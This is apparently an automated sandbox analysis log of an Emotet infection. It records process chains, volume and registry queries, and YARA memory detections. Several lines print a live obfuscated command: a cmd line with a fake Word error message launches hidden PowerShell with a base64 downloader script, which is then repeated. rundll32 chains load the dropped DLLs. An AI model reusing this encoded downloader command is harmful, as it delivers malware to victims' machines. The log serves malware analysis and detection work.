                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArACJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyStringJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyStringJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Itwxrtu\wpjaux.bsi',JnNGuImBTNGmQJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Itwxrtu\wpjaux.bsi',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gesxrslxkhcnse\kfdzbsrddlvak.pye',cGgBEdarJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gesxrslxkhcnse\kfdzbsrddlvak.pye',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqecxzw\ccpuwn.kyt',VWMVjHoJWTwKeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqecxzw\ccpuwn.kyt',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Swvcgiaelz\sxbljovgm.oha',GOGZBCfUKJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Swvcgiaelz\sxbljovgm.oha',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qxunlgclf\rrjtkhok.xfz',saFFaIUJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qxunlgclf\rrjtkhok.xfz',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uaceqxeeiarsm\ncdxfzylbgum.nhe',sKCf
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uaceqxeeiarsm\ncdxfzylbgum.nhe',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yorvuovvtuqtxoj\wcvkwfajnrxlso.qcf',HPKSdoSG
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcA
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArAC
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArACJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 00000013.00000002.2111956527.0000000000190000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2106050192.0000000000310000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2091845776.0000000001FF0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2110708042.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2109890189.0000000000430000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2107113862.0000000000480000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2094977205.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2095661393.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2112358022.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2091794029.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2097666740.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2095245962.0000000000680000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2109656728.0000000000370000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.3149778649.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2099840618.0000000000380000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2090614258.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2091834475.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2106091733.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2103352962.0000000000250000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2103524497.0000000001FF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2094912701.0000000000590000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2103466457.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2088248938.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2099966335.0000000000410000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2091778944.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
